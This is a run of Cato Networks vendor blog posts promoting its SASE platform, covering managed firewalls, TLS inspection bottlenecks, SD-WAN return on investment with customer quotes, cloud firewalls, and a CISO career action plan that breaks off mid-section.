SASE didn’t introduce new capabilities per se. Firewalling, SWG, CASB, ZTNA, SD-WAN, and malware inspection -- all of SASE's core capabilities receded SASE. What SASE introduced was a new way of delivering those capabilities: a singular cloud service where the capabilities are truly one -- fully converged (or integrated) together -- managed from one console and delivered globally from one platform, everywhere. Yes, evaluating features must be part of any SASE platform assessment, but to focus on features is to miss the point. It is the SASE values of convergence, simplicity, ubiquity, and flexibility -- not features -- that ultimately differentiate SASE platforms.
As organizations grow more reliant on expanding IT infrastructures, cyber threats are also growing more sophisticated. A mature security program is essential to protect the...
How a Managed Firewall Can Help Close Corporate Security Gaps As organizations grow more reliant on expanding IT infrastructures, cyber threats are also growing more sophisticated. A mature security program is essential to protect the organization against cyber attacks. However, many security teams lack the resources and personnel to keep pace of their expanding duties.
As security teams become overwhelmed, identifying ways to ease their burden is essential to minimizing the security gaps that leave companies vulnerable to attacks.
Most Security Teams are Struggling
Security teams’ responsibilities are rapidly expanding, and many are struggling to keep up. Some of the major challenges that IT and security teams face include:
Expanding IT Infrastructure: Corporate IT infrastructures are expanding and growing more diverse due to numerous drivers. Companies are increasingly adopting cloud infrastructure, remote and hybrid work models, and Internet of Things (IoT) and mobile devices. All of these bring new attack vectors and unique security requirements. Heterogeneous Architectures: The modern IT environment includes various architectures and environments. Each of these must be properly configured, and secured. This can create a diverse security architecture of standalone products that are difficult to effectively monitor, and manage.
Security Alert Overload: This collection of various security solutions also contributes to the alert overload facing modern security teams. The average enterprise security operations center (SOC) sees over 10,000 alerts per day, each of which requires an average of 24-30 minutes to address. With the inability to properly investigate every security alert — or even a reasonable percentage of them — security teams might make decisions that let real threats slip through the gaps, potentially while they waste their efforts on false positives. Vulnerability Management: Software vulnerabilities in production systems are an issue that is quickly spiraling out of control. Over 28,000 new vulnerabilities were discovered in 2021 alone, a 23% growth over the more than 23,000 discovered the previous year. Identifying, testing, and applying patches for vulnerabilities in corporate software and hardware — including the third-party libraries and components used by them — is a significant task, and many patch management programs lag behind, leaving the organization vulnerable.
At the same time, the cybersecurity industry is facing a significant skills gap, which means that companies struggle to attract and retain skilled personnel to fill critical roles. Overwhelmed and understaffed security teams lead to security gaps.
[boxlink link="https://catonetworks.easywebinar.live/registration-the-upside-down-world-of-networking-and-security?utm_medium=blog_top_cta&utm_campaign=upside_down_webinar"] The Upside-Down World of Networking & Security | Webinar [/boxlink]
Firewall Management is a Major Chore
Closing these security gaps requires the ability to reduce security teams’ workloads to a manageable level. One area with significant room for improvement is firewall management.
A network firewall is the cornerstone of an organization’s security architecture; however, it is not an easy tool to manage. Some of the time-consuming duties associated with firewall management include:
Firewall Rule Maintenance: Network firewall rules should be designed to restrict network traffic to only that required for business purposes. With increasingly diverse IT infrastructures, organizations must develop and maintain a range of firewall rules tuned to the needs of different devices and environments. Patch Management: Like other products, firewalls need patches and updates, and, due to their role within an organization’s environment, are common targets of attack. Security personnel should promptly test and apply updates when they become available. Monitoring and Management: Firewalls are not “set it and forget it” systems and require ongoing monitoring and maintenance to be effective. Investigating alerts, validating the effectiveness of firewall rules, and other ongoing activities consume time and resources.
Firewalls can significantly benefit an organization by blocking inbound and WAN-bound attacks before they reach their intended targets. By performing all of these firewall management tasks, security personnel lower corporate cybersecurity risk and achieve clear benefits to the organization.
However, the time spent configuring and managing firewalls could also be spent on other valuable security tasks as well. For example, the time and resources devoted to firewall management may have also been used to identify and remediate an intrusion before it became a data breach or malware infection.
A Managed Firewall Realigns Security Priorities
Security teams have roles and responsibilities that commonly exceed their abilities to carry them out. As corporate infrastructure grows larger and more complex, the growth in security team headcount cannot keep up. As a result, some work may be left undone, and security teams are often forced to perform triage to determine which tasks can be delayed or left incomplete with minimal risk to the organization.
Organizations can resolve this issue by taking steps to alleviate the burden on security personnel. By taking some of the tedious work — such as firewall maintenance— off of their plates, an organization can free up resources and its security team’s time and expertise for tasks where it is more greatly needed.
A managed firewall can enhance security while reducing overload on security personnel. A managed firewall service enables an organization to outsource responsibility for firewall management to a team of third-party experts. This provides companies with firewall rules based on evolving threat intelligence and solutions configured in accordance with industry best practice and regulatory requirements.
A managed Secure Access Service Edge (SASE) deployment takes this a step further, handing over the responsibility for maintenance of the organization’s entire network security stack to a third-party provider instead of just the firewall. Managed SASE also comes with additional benefits, such as improved integration of network and security functionality and optimized routing of WAN traffic over dedicated network links.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a complete cloud-native security service edge, Cato SSE 360, including Zero Trust Network Access (ZTNA), Secure Web Gateway (SWG), Cloud Access Security Broker (CASB), Data Loss Prevention (DLP), and Firewall as a Service (FWaaS) into a global cloud service. Cato optimizes and secures application access for all users, locations, and applications, and empowers IT with a simple and easy to manage networking and security architecture. Learn more about optimizing your organization’s security operations by signing up for a free demo today.
Corporate IT networks are rapidly changing. Evolving cloud and technological innovation have spurred digital transformation efforts. The pandemic has normalized remote and hybrid work, causing...
September 28, 2022
5m read
SASE Enables Consistent Security for the Modern Enterprise Corporate IT networks are rapidly changing. Evolving cloud and technological innovation have spurred digital transformation efforts. The pandemic has normalized remote and hybrid work, causing many employees to work from outside the office and creating the need to securely provide remote access to the workforce.
These changes in corporate IT infrastructure create new security challenges as companies adapt to protect new environments and to combat an evolving cyber threat landscape. In many cases, organizations are finding that their existing security architecture — which was designed to secure an IT infrastructure that is mostly or wholly on-premises — is not up to the task of meeting the security requirements and business needs of the modern, digital enterprise.
The Corporate WAN is Rapidly Changing
In the past, the majority of an organization’s IT assets were located on-prem. The company managed its own data centers, and employees were primarily connected directly to the corporate LAN. Additionally, a company’s IT assets were largely homogenous, consisting of workstations and servers that had similar, well-known security needs.
Within the last several years, the corporate network has undergone significant changes. With the introduction of cloud computing, a growing percentage of an organization’s IT assets are located outside of the traditional network perimeter on infrastructure managed by a third party. Since 89% of companies have multi-cloud deployments, companies must learn to properly operate and manage multiple vendors’ unique solutions.
The growth of remote and hybrid work models in recent years has further transformed the corporate network. In addition to moving employees and their devices off-site, remote work also impacts the range of devices used for business purposes. Mobile devices are increasingly gaining access to corporate data and systems, and bring your own device (BYOD) policies mean that company data may be accessed and stored on devices that the company does not own or fully control.
Finally, the adoption of new technologies to improve corporate productivity and efficiency has an impact. Internet of Things (IoT) devices — including both commercial and consumer systems — are connected to corporate networks. These IoT devices have unique security challenges and introduce significant risk to corporate networks.
As corporate IT environments change, so do their security needs. New environments and devices have unique security risks that must be mitigated. The solutions designed for on-prem, primarily desktop environments, may not effectively protect new infrastructure if they can be used by them at all.
[boxlink link="https://catonetworks.easywebinar.live/registration-whats-the-difference-between-sse-360-and-sase?utm_medium=blog_top_cta&utm_campaign=AMA_sse_webinar"] Ask Me Anything: What’s the Difference Between SSE and SASE? | Watch Now [/boxlink]
Legacy Solutions Do not Fit Modern Security Needs
Many organizations have existing security architectures that are designed for a particular IT architecture. As this architecture evolves, these security solutions are often ill-suited to securing an organization’s new deployment environments and devices for various reasons, including:
Location-Specific Protection: Often, corporate security architectures are designed to define and secure the perimeter of the corporate network against inbound threats and outbound data exfiltration. However, the growth of cloud computing, remote work, and the IoT means that this perimeter is rapidly expanding to the point where it is infeasible and pointless to secure since it includes the entire Internet.Limited Scalability: Appliance-based security solutions, such as network firewalls, are limited by their hardware. A computer only has so much memory and CPU, and a network interface card has a maximum throughput. Cloud scalability and the growth of corporate networks can result in security appliances being overwhelmed with more traffic than they can handle.Computational Requirements: Many endpoint security solutions require a certain amount of processing power or memory on the device to function. As resource-constrained devices such as mobile and IoT devices become more common, these solutions may not be usable in all areas of an organization’s IT infrastructure.Environment-Specific Requirements: As corporate IT environments grow more complex and diverse, different environments may have specific security considerations. For example, appliance-based network firewalls and security solutions are not a feasible option in cloud deployments since the organization lacks control over its underlying IT infrastructure.
Attempting to adapt an organization’s existing security architecture to secure its evolving environment can create disjointed security policies that are inconsistently enforced across the corporate WAN. For example, cloud-based infrastructure can be protected by cloud-focused security solutions that differ from those protecting on-prem infrastructure, which increases the complexity and overhead of security management. Remote workers and mobile devices may suffer network performance issues as traffic is backhauled for security inspection before being routed on to its destination.
The legacy security solutions that comprise traditional perimeter-focused security architectures are designed for networks that are rapidly becoming extinct. Often, these solutions adapt poorly to securing the modern, distributed corporate WAN.
Designing Security for the Modern Enterprise
As corporate networks become more distributed, security must follow suit. Effectively protecting the modern corporate WAN requires security solutions that can provide consistent protection and security policy enforcement throughout the corporate network.
Secure Access Service Edge (SASE) is designed for the distributed enterprise and addresses the common shortcomings of legacy security solutions. SASE is implemented using a network of cloud-based points of presence (PoPs) that can be deployed geographically near an organization’s scattered IT assets and can take advantage of cloud scalability to meet evolving business needs. SASE solutions also incorporate a full security stack — including solutions designed for cloud infrastructure and remote users — enabling traffic to be inspected by any PoP before being optimally routed to its destination.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. To learn more about Cato SASE Cloud and how it can help your organization’s security architecture keep up with the evolution of your network infrastructure, sign up for a demo today.
A growing percentage of Internet traffic is protected by encryption. While estimates vary, most agree that at least 80% of Internet traffic uses SSL/TLS to...
September 22, 2022
5m read
Traditional Firewalls Can’t Keep Up with the Growth of Encrypted Traffic A growing percentage of Internet traffic is protected by encryption. While estimates vary, most agree that at least 80% of Internet traffic uses SSL/TLS to ensure confidentiality, integrity, and authenticity of the data being transmitted. According to Google, approximately 95% of web browsing uses the encrypted HTTPS protocol.
This trend toward traffic encryption has been driven by a few different factors. As users become more educated about the differences between unencrypted HTTP and encrypted HTTPS and the threat of various attacks, they are opting for the more secure option wherever possible. Web browser vendors like Google are encouraging this trend by defaulting to the encrypted version of sites and labeling sites that only support HTTP as unsafe and reducing their SEO scores.
The move toward data encryption is a mixed blessing for cybersecurity. On one hand, the widespread use of SSL/TLS can help protect against phishing attacks or the exposure of user credentials and other sensitive data to someone eavesdropping on corporate network traffic. On the other hand, the same encryption that protects against eavesdroppers can also limit the effectiveness of an organization’s cybersecurity tools. Identification of malware and other malicious content with network traffic requires the ability to inspect the contents of packets traveling over the network. If this traffic is encrypted and network security solutions do not have the encryption key, then their threat prevention and detection capabilities are limited.
Network security solutions can overcome these challenges, but it comes at a cost. As the volume of network traffic increases and a growing percentage is encrypted, traditional network firewalls are falling behind, creating unnecessary tradeoffs between network performance and security.
Encrypted Traffic Inspection is a Bottleneck
Some organizations address the challenges that traffic encryption poses to security by performing TLS inspection. Security solutions that have access to the encryption keys used to protect network traffic can decrypt that traffic and inspect it for malicious content or data exfiltration before allowing it to continue on to its destination.
SSL inspection provides the ability to perform the deep packet inspection that security solutions need to do their jobs. However, decryption is a computationally expensive and time-consuming process. With growing volumes of encrypted traffic, decryption functionality within security solutions can create a significant bottleneck and degrade network performance. These issues are exacerbated by the fact that multiple solutions within an organization’s security architecture may need insight into the contents of network packets to fulfill their role. For example, firewalls, intrusion prevention systems (IPSs), secure web gateways (SWGs), and other security solutions may decide whether to allow or block traffic based on its contents.
[boxlink link="https://catonetworks.easywebinar.live/registration-the-upside-down-world-of-networking-and-security?utm_medium=blog_top_cta&utm_campaign=upside_down_webinar"] The Upside-Down World of Networking & Security | Webinar [/boxlink]
Decrypting TLS traffic can exhaust these security tools’ compute capacity, creating a bottleneck. If an organization has deployed multiple solutions that independently perform TLS decryption and deep packet inspection, then the effects of decryption on network performance are cumulative.
TLS inspection is essential to identifying and blocking threats before they enter an organization’s network and to stopping data exfiltration before it becomes a breach. However, the costs of doing so can be high, creating a tradeoff between network performance and security.
SASE Enables Scalable Enterprise Security
TLS inspection is a vital capability for many security solutions because it enables deep packet inspection and detection of malicious content within network traffic. One of the primary barriers to implementing TLS inspection at scale is that security solutions’ resources are exhausted, which can create significant latency as each tool in an organization’s security architecture individually decrypts and inspects network traffic.
Secure Access Service Edge (SASE) provides the ability to perform TLS inspection while minimizing the impacts on network performance and latency. Three core capabilities that make this possible include:
#1. Solution Convergence: SASE solutions converge a full network security stack into a single solution. This makes it possible to decrypt traffic once and provide all security solutions with access to the decrypted data for inspection without jeopardizing security. By eliminating the individual traffic decryption by each device, SASE dramatically decreases the impact of TLS inspection on network performance.
#2. Cloud-Native Design: SASE points of presence (PoPs) are built with cloud-native software. By deploying security functionality in the cloud, SASE can take advantage of cloud scalability, eliminating the bottlenecks created by computationally expensive decryption operations.
#3. Cost Saving: By offloading all the TLS inspection work to an elastic cloud-native SASE service, enterprises don't need to worry about upgrading on-premises appliances prematurely. This saves the organization both the procurement and the integration costs of the new appliances.
TLS inspection is vital to companies’ ability to protect themselves against evolving cyber threats. As the volume of encrypted traffic grows, traditional firewalls can’t keep up, creating tradeoffs between network performance and security. SASE is vital to the future of enterprise security because it enables strong corporate network security without compromising performance.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about improving your network visibility, performance, and security with Cato SASE Cloud by signing up for a demo today.
What is the ROI on SD-WAN projects? Most enterprises look at SD-WAN as an MPLS alternative, hoping to reduce their MPLS connectivity costs. But the...
September 20, 2022
6m read
The Return On Investment of SD-WAN What is the ROI on SD-WAN projects? Most enterprises look at SD-WAN as an MPLS alternative, hoping to reduce their MPLS connectivity costs. But the actual SD-WAN ROI is a mix of hard and soft savings from increasing overall network capacity and availability to a reduced operational load of managing and securing the network. Let's look at the various areas of savings SD-WAN can offer and the resulting ROI.
SD-WAN ROI Driver #1: Reducing MPLS Connectivity Costs
Enterprises have long invested in managed MPLS services to connect locations. The bandwidth is expensive (relative to Internet capacity) and often limited or unavailable on some routes, forcing companies to either pay exorbitant fees to connect locations or, more likely, resort to Internet-based VPNs, complicating network design.
SD-WAN promises to break that paradigm, replacing MPLS entirely or partly with affordable last-mile Internet connectivity. The magnitude of SD-WAN savings is often related to how much MPLS can be replaced and the type of Internet-based connectivity.
Here there's a balance of considerations. Symmetrical Internet connections (also known as Dedicated Internet Access or DIA) offer guaranteed capacity, providing small savings relative to MPLS. Asymmetrical connections with best-effort capacity, such as xDSL or cable, can be aggregated together to match and exceed MPLS last mile uptime at a substantial discount compared to MPLS.
[boxlink link="https://www.catonetworks.com/resources/5-things-sase-covers-that-sd-wan-doesnt/?utm_medium=blog_top_cta&utm_campaign=things_sase_covers_sd-wan_doesnt"] 5 Things SASE Covers that SD-WAN Doesn’t | EBOOK [/boxlink]
Often, the ROI argument for SD-WAN is less about hard cost savings and more about optimizing network spending. Enterprises receive far more capacity and functionality for the same amount spent on MPLS. The cost per bit drops dramatically, enabling IT to equip locations with 5x to 10x more capacity. With SD-WAN able to aggregate and failover between multiple last-mile lines, uptime increases significantly
One example was Fischer & Co, an automotive company that reduced its connectivity costs by 70% by replacing MPLS with Internet last-mile and Cato SASE Cloud while relying on Cato SSE 360 for network security protection. Along with the cost savings, Fischer & Co gained the agility to respond to new business challenges instantly, adding new security services or opening new locations, all without the operational overhead of upgrading and scaling of branch security appliances.
SD-WAN ROI Driver #2: Reducing the Costs of Branch Security
SD-WAN also allows organizations to avoid the branch security costs of legacy networks. With legacy architectures, enterprises backhaul branch Internet traffic to a regional datacenter for security inspection and policy enforcement. This approach consumed precious MPLS capacity, increasing costs while adding latency that undermined the user experience. With SD-WAN, companies avoid consuming expensive MPLS capacity on Internet traffic. Instead, MPLS only carries critical application traffic, offloading bandwidth hungry and less critical applications to Internet connections.
However, this now requires branch security to inspect and enforce policies on the Internet flows. SD-WAN appliances include basic firewalls, but those firewalls lack the threat protection needed by today's enterprises. Branch firewalls offer more capabilities, but their capacity constraints limit inspection capabilities for CPU-intensive operations, such as SSL decryption, anti-malware, and IPS. As traffic grows or new capabilities are enabled, companies are often forced to upgrade their appliances. Cloud-based SSE solutions are more scalable but incur the operational cost of integrating and managing another point solution.
Network and network security convergence through a single-vendor SASE platform offers a way to tackle this tradeoff. Alewijnse, a Dutch manufacturing company, eliminated its MPLS network and applied enterprise-grade security to all traffic by switching to the Cato SASE Cloud, taking advantage of Cato’s full SSE 360 protection. "With Cato, we got the functionality of SD-WAN, a global backbone, and security service for our sites and mobile users, integrated together and at a fraction of the cost," said Willem-Jan Herckenrath, ICT Manager at Alewijnse.
UMHS, a healthcare company, eliminated its MPLS network and branch security firewalls by moving to Cato's converged, cloud-native and global SASE service. "UMHS is so satisfied with the decision to switch its firewalls to Cato that it plans to migrate all locations using MPLS as soon as their contracts expire. A cost analysis done by the organization shows that this change will save thousands of dollars by having all of its 13 locations connected to the Cato Cloud," said Leslie W. Cothren, IT director at UMHS.
SD-WAN ROI Driver #3: Network Automation and Co-managed Services
One of the costliest components of enterprise networking is the network management model. Legacy network management comes in two flavors: Do It Yourself (DIY) and a managed service. With DIY, network managers often use crude tools like Command Line Interfaces (CLIs) to manage router configurations. Since any network outage costs the business, networking teams focus on availability, evolving the network very slowly. Maintaining dynamic traffic routing or failover becomes very complex. To reduce this complexity, IT outsources network management to service providers, increasing costs and longer resolution times depending on the provider.
SD-WAN promises an improvement in network agility. DIY enterprises can automate network changes and increase network resiliency. However, SD-WAN does add "one more box to manage." For enterprises that prefer a managed service, a new co-managed model enables IT to make quick network changes through a self-service model while the service provider maintains the SD-WAN service. In a co-managed model, the customer doesn't have to maintain the underlying infrastructure and can focus instead on business-specific outcomes.
A case in point is Sun Rich, a food supplier with a North American network comprised of multiple MPLS providers, SD-WAN appliances, WAN optimization solutions, and network security devices – all managed by a small IT team. Every appliance came with its management platform, complicating troubleshooting. By switching to the Cato SASE Cloud, Sun Rich reduced costs and gained control over network and security changes through Cato's single, converged management application. "Based on our size, our annual renewals on our appliances alone were nearly Cato's price," says Adam Laing, Systems Administrator at Sun Rich. "Simplification also translates into better uptime. You can troubleshoot faster with one provider than five providers," he says.
But Is SD-WAN Enough? Comparing SD-WAN to SASE
SD-WAN offers significant opportunities to reduce costs and gain more "bang for the buck" compared to MPLS, but SD-WAN alone will be insufficient to address the needs of today's workforce. As such, an SD-WAN ROI evaluation must consider the myriad of additional point solutions needed to meet enterprise networking and security requirements.
The most obvious example, perhaps, is the hybrid workforce. SD-WAN only connects locations. Remote users will require additional services. Security requirements demand protection against malware, ransomware, and other network-based threats not provided by the rudimentary firewalls included in SD-WAN devices, forcing the deployment of third-party security solutions. Cloud-connectivity solutions are also required. Additionally, SD-WAN performance over the long haul is undermined by the unpredictability of the Internet core, requiring the subscription and integration of yet another solution – a global private backbone.
Separately, these individual solutions may be manageable, but together they significantly complicate troubleshooting and deployment. Deployment takes longer as each point solution must be deployed. Problems take longer to resolve as operations teams must jump between management interfaces to solve issues. In short, organizational agility is reduced at a time when agility is often the very reason for adopting SD-WAN.
How Does SASE Solve SD-WAN's Limitations: Read the eBook
SASE solves these challenges while reducing overall spending compared to MPLS alternatives, like SD-WAN. Cato SASE Cloud overcomes SD-WAN's limitations with built-in SSE 360, zero trust, cloud-native architecture with a complete range of security protections, including Secure Web Gateway (SWG), Cloud Access Security Broker (CASB), Data Loss Prevention (DLP), Zero Trust Network Access (ZTNA), and Firewall as a Service (FWaaS) with Advanced Threat Prevention (IPS and Next Generation Anti-Malware). Those capabilities operate from Cato's global platform, making them available anywhere while providing location and remote users with MPLS-like performance at a fraction of global MPLS costs. And with all components managed through a single interface, troubleshooting happens far faster than when juggling multiple interfaces. In short, SASE provides the promises of SD-WAN without its limitations, delivering considerable cost savings without comprising security, simplicity, or performance. For a more in-depth comparison of SASE vs SD-WAN, download our complimentary eBook, 5 Things That SASE covers that SD-WAN Does Not.
Today, nearly all companies have some form of cloud infrastructure, and 89% are operating multi-cloud deployments. In general, this trend seems to be continuing with...
September 15, 2022
6m read
Network Firewalls Are Still Vital in the Era of the Cloud Today, nearly all companies have some form of cloud infrastructure, and 89% are operating multi-cloud deployments. In general, this trend seems to be continuing with many companies planning to move additional assets to the cloud.
With the adoption of cloud infrastructure, organizations must reexamine their existing security infrastructures. Some security solutions are ill-suited to securing cloud environments, and the cloud introduces new security risks and challenges that must be managed as well. However, network firewalls are still a relevant and vital security solution in the era of the cloud.
Cloud Security Can Be Complex
Companies are moving to the cloud due to the various benefits that it provides. Cloud deployments increase the scalability and flexibility of IT infrastructure and are also better suited to supporting a distributed enterprise comprised of on-site and remote workers. Additionally, the cloud supports new methods of application development, such as a transition to serverless applications.
Another major selling point of the cloud is that customers can outsource responsibility for some of their infrastructure stacks to the service provider. Up to a certain layer, the service provider is wholly responsible for configuring, maintaining, and securing the leased infrastructure. However, this does not translate to a total handover of security responsibility. Under the cloud shared responsibility model, the cloud customer is responsible for managing and securing the portion of the infrastructure stack that they access and control.
Cloud deployments differ significantly from traditional, on-prem data centers. Many organizations struggle to effectively adapt their security models and architectures to support their new cloud environments, leading to widespread security misconfigurations and frequent cloud data breaches.
The interconnection between on-prem and cloud environments and between applications within cloud deployments makes network security vital to cloud security. Network firewalls are a crucial part of this, inspecting traffic flowing between different areas and limiting the risk of threats entering the corporate network or spreading within it.
[boxlink link="https://www.catonetworks.com/resources/why-remote-access-should-be-a-collaboration-between-network-security/?utm_medium=blog_top_cta&utm_campaign=network-and-security-wp"] Why remote access should be a collaboration between network & security | White Paper [/boxlink]
What to Look for in a Network Firewall
Many organizations already have network firewalls in place; however, a network firewall designed to secure the perimeter of the corporate LAN is ill-suited to protecting a distributed enterprise WAN. As companies move to the cloud, there are a number of core capabilities a network firewall should include:
Location Agnostic
Companies are growing increasingly distributed. In addition to traditional on-prem data centers, organizations are moving data storage and applications to cloud-based infrastructure, often as part of multi-cloud deployments. At the same time, employees are moving outside of the traditional network perimeter with the growth of remote and hybrid work, and the use of mobile devices for business.
As a result, network firewalls need to be able to provide protection wherever a device is located. Backhauling traffic to the corporate network for security inspection doesn’t work because it hurts network performance and increases load on on-prem IT infrastructure. Network firewalls must be as distributed as the rest of an organization’s IT assets.
Performance
Companies are increasingly dependent on Software as a Service (SaaS) applications to provide critical functionality to both on-prem and remote employees. Often, these SaaS applications are latency-sensitive, and poor network performance has a significant impact on corporate productivit
Network firewalls must offer strong performance to avoid creating tradeoffs between network performance and security. If network firewalls create latency due to inefficient routing or an inability to inspect traffic at line speed, they are more likely to be bypassed or otherwise undermined.
Scalability
Corporate IT infrastructures are rapidly expanding as companies adopt cloud infrastructure, Internet of Things (IoT) devices, and mobile devices. As a result of this digital transformation, there are more devices, more applications, and more data flowing over corporate networks.
Network firewalls are responsible for inspecting and securing this network traffic, so they must scale with the network. As IT infrastructure takes advantage of the power of cloud scalability and IoT devices proliferate, network firewalls also need the scalability that the cloud provides.
Solution Integration
Since corporate security architectures are growing increasingly complex, the variety of environments and endpoints that security analysts must secure can result in an array of standalone security solutions. This security sprawl is exacerbated by the evolution of the cyber threat landscape and the need to deploy defenses against new and emerging threats.
These complex and disconnected security architectures overwhelm security personnel and degrade a security team’s ability to rapidly identify and respond to threats. Standalone solutions require individual configuration and management, force context switching between dashboards when investigating an incident, and make security automation difficult or impossible.
A network firewall is the foundation of a corporate security architecture. To enforce consistent security policies and controls across all of an organization’s IT assets — including on-prem, cloud-based, and remote systems — companies need a network firewall that can operate effectively in all of these environments. Additionally, this firewall should be integrated with the rest of an organization’s security architecture to support rapid threat detection and response and enable security automation.
Simplifying Network Security with SASE
The transition to cloud-based infrastructure makes reconsidering and redesigning corporate security architecture critical. Cloud environments are more distributed and more exposed to potential threat actors than on-prem environments, and perimeter-based security models that worked in the past no longer apply when the perimeter is rapidly dissolving. While companies could attempt to build and integrate their own security architectures using various standalone solutions, a better approach is to adopt security designed for the modern corporate network.
Secure Access Service Edge (SASE) implements security with a network of cloud-based points of presence (PoPs) that meet all of the needs of the modern network firewall:
Location Agnostic: SASE PoPs are deployed as virtual appliances in the cloud. This allows them to be deployed anywhere, making them geographically convenient to devices located on-prem, remote, or in the cloud.Performance: Each SASE PoP converges a full security stack, so security inspection and policy enforcement can happen at once and anywhere. This eliminates the need to backhaul traffic for scanning.Scalability: SASE PoPs host cloud-native software that can leverage the scalability benefits of cloud infrastructure. A SASE Cloud can elastically scale vertically with more compute and throughput in a certain PoP, and horizontally with more PoPs in new geographical locations.Solution Convergence: SASE PoPs converge a range of network and security functions, including a next-generation firewall, intrusion prevention system (IPS), zero-trust network access (ZTNA), SD-WAN, and more. A solution built to converge these functions into a single platform can optimize and streamline their interactions to a degree that is impossible with standalone solutions.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about how Cato SASE Cloud can improve your organization’s cloud security by signing up for a demo today.
If you're a Security professional looking to become a CISO, then you've come to the right place. This five-step guide is your plan of action...
September 13, 2022
8m read
The 5-Step Action Plan to Becoming CISO The Path to Becoming CISO Isn't Always Linear
There isn’t one definitive path to becoming a CISO.
Don’t be discouraged if your career path isn’t listed above or isn’t “typical.” If your end goal is to become a CISO, then you’ve come to the right place. Keep reading for a comprehensive action plan which will guide you from your current role in IT, IS or Cybersecurity and on the path to becoming a world-class CISO.
Step 1:
Becoming a CISO is About Changing Your Focus
The Difference Between IS, IT or Cybersecurity Roles and a CISO Role: Tactical vs. Strategic
Making The Shift from Security Engineer to Future CISO
The most common mistake that security engineers make when looking to become CISO is focus. To be successful as a security engineer the focus is on problem hunting. As a top-tier security professional, you must be the best at identifying and fixing vulnerabilities others can’t see.
How to Think and Act Like a Future CISO
While security engineers identify problems, CISOs translate the problems that security engineers find into solutions for C-suite, the CEO and the board. To be successful in the CISO role, you must be able to transition from problem-solver to a solution-oriented mindset.
A common mistake when transitioning to CISO is by leading with what’s most familiar – and selling your technical competency. While understanding the tech is crucial when interfacing with the security team, it’s not the skillset you must leverage when speaking with C-suite and boards. C-suite and boards care about solutions – not problems. They must feel confident that you understand the business with complete clarity, can identify cyber solutions, and translate them in terms of business risks, profit and loss. To be successful in securing your new role, focus on leveraging cyber as a business enabler to help the business reach its targeted growth projections.
The Skillset Necessary to Become a CISO
Translate technical requirements into business requirementsBrief executives, VPS, C-level, investors and the boardUnderstand the business you’re in on a granular level(The company, its goals, competitors, yearly revenue generated, revenue projections, threats competitors are facing, etc.)Excellent communication: Send effective emails and give impactful presentationsBalance the risk between functionality and security by running risk assessmentsFocus on increasing revenue and profitability in the organizationFocus on a solution-oriented mindset, not an identification mindset
[boxlink link="https://www.catonetworks.com/resources/cato-sse-360-finally-sse-with-total-visibility-and-control/?utm_source=blog&utm_medium=top_cta&utm_campaign_sse360"] Cato SSE 360: Finally, SSE with Total Visibility and Control | Whitepaper [/boxlink]
Step 2:
Getting Clear on the CISO Role: So, What Does a CISO Actually Do?
Learn The CISO’s Role and Responsibilities (R&R)
The CISO is essentially a translator between the security engineering team and C-suite.
Step 3:
Set Yourself Up for Success in the Role: Measure What Matters
What you measure in your role will ultimately determine your career success. Too often CISOs set themselves up for failure by playing a zero-sum security game.
This means any security incident = CISO gets fired = No one wins
But successful CISOs know that cybersecurity is a delicate balancing act between ensuring security and functionality.
100% security means 0 functionality, and vice versa
Strategic CISOs understand this and set themselves up for success by working with the CEO and board to minimize exposure and establish realistic KPIs of success.
Establishing Your Metrics of Success in the CISO Role
What makes CIOs so successful in their role?
A single metric of success: 5 9s.
This allows CIOs to focus on the R&R necessary to achieve this goal.
Suggested CISO KPI & KPI Setting Process
Run an analysis to see how many attempted attacks take place weekly at the organization, to establish a benchmark.Provide an executive report with weekly attack attempt metrics (i.e., 300.)Create a proposed benchmark of success: i.e., preventing 98% of attacks.Get management signoff on your proposed KPIs.Provide weekly reports to executives with defined attack metrics: attempted weekly attacks + prevented.(Ensuring security incidents are promptly reported to C-suite and board.)Adjust KPIs as necessary and receive management signoff.
Step 4
Mind the Gap: Bridge Your Current Technical and Business Gaps
Recommended Technical Education
GIAC / GSEC Security EssentialsCISSP (Certified Information Systems Security Professionals)
OR CISM (Certified Information Security Manager) CertificationOR CISA (Certified Information System Auditor) Certification
SASE (Secure Access Service Edge) CertificationSSE (Security Service Edge) Certification
Recommended Technical Experience
At least 3-5 years in IS, Cybersecurity, Networking or IT with a strong security focus
Recommended Business Education
An MBA or equivalent business degree, or relevant business experienceCPA or accounting courses
Recommended Business Experience
Approximately 3-5 years of business experience
Business Operations, Business Management, SOC Manager, or roles that demonstrate your business, management and leadership acumen
Recommended Understanding Of:
Industry security standards including NIST, ISO, SANS, COBIT, CERT, HIPAA.Current data privacy regulations, e.g., GDPR, CCPA and any regional standards.
Step 5:
How to Get a CISO Job with Limited or No Previous Experience
It’s the age-old dilemma – how do I get a job without relevant experience? And how to I get relevant experience without a job?
Take On a Virtual CISO Role at a Friend or Family Member’s Small Business
Offer 3 hours of virtual CISO service a week.In exchange, ask for 3 recommendations a month and to service as a positive reference.
Can you receive mentorship from an existing CISO?
Do friends, family or former colleagues know any CISOs you can connect with? Start there.Reach out on LinkedIn to CISOs and invite them to coffee or dinner.Ask them if you can meet up and receive mentorship over dinner once a month (they pick the location, and you pay.)
Remember: It’s a numbers game. Don’t get discouraged after a few “no's” or a lack of responses.
Getting Your First CISO Job: Your Action Plan for Career Success
Applying For Jobs
Your resume has one and only one goal – to get you the interview.Week 1:
Send out 20 resumes for CISO jobs with your existing resumeHow many respond and request interviews (within 2 weeks)?If you get under a 50-70% success rate, you need to revise your resume.
Your goal is to repeat this process until you get a minimum of 10 positive responses for every batch of 20 resumes you send out (giving recruiters 1.5 - 2 weeks to respond.) Be ready to adapt and adjust your resume as many times as necessary (using the defined process above,) until you hit your benchmarks of success.
Revising your Resume for Success
